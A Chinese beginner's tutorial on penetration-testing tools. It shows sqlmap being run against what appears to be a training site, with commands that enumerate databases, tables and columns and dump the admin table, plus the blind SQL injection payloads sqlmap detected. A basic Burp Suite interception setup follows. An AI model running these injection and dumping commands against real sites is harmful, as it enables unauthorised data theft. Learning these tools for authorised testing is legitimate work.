渗透测试常用工具讲解(一)

Sqlmap的基础使用

什么是sqlmap?
sqlmap是一款实现自动化渗透测试攻击的工具

具体操作细节:

首先打开你所下载的sqlmap的文件夹在这里插入图片描述
然后在上方的地址处输入cmd在这里插入图片描述
这样可以快速创建一个在当前文件夹的cmd在这里插入图片描述在安装了python环境的前提下,输入python sqlmap.py运行sqlmap

在这里插入图片描述
输入命令python sqlmap.py -u “你认为存在sql注入的url”
这里我们以猫舍为例59.63.200.79:8003/?id=1
在这里插入图片描述看到这个提示,说明这是个mysql数据库
(这里Y大写说明默认回车就是Y)
我们这里按回车在这里插入图片描述
这里结果显示:
1.根据id=1 and 4456-4456
判断出布尔盲注
2.根据id=1 and (select 2776 from (select(sleep(5)))wgoU)
判断出时间盲注

用这条命令获得数据库名:
python sqlmap.py -u “59.63.200.79:8003/?id=1” --dbs

在这里插入图片描述
得到三个数据库名information_schema,maoshe,test
在这里插入图片描述

再用这条命令获取maoshe这个数据库里的表名:
python sqlmap.py -u “59.63.200.79:8003/?id=1” -D maoshe --tables

在这里插入图片描述
获取四个表名:
admin,dirs,news,xss
在这里插入图片描述

再用这条命令获取列名:
python sqlmap.py -u “59.63.200.79:8003/?id=1” -D maoshe -T admin --columns
在这里插入图片描述
一般我们不这样用,我们用这条语句:
python sqlmap.py -u “59.63.200.79:8003/?id=1” -D maoshe -T admin --dump
在这里插入图片描述
这是一个偷库的过程(是一个很危险的过程,建议不要用)

在这里插入图片描述具体会将这个库的信息保存到这个文件夹中,可以通过这个路径进行查询

Burpsuite

什么是Burpsuite?
Burpsuite是基于抓包的攻击平台
什么又是抓包?
抓包就是将两个人传递的数据包中途拦截下来,可以对此数据包进行篡改,重放,跑包等操作

具体操作:

找到扩展程序
在这里插入图片描述

首先打开以及装好的burp,选择代理->选项->勾选8080端口
在这里插入图片描述随便找到一个后台登录的页面
打开代理
在这里插入图片描述

点击拦截请求
在这里插入图片描述
刷新页面

在这里插入图片描述
会得到一个数据包
注意:https的网站不能抓包

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值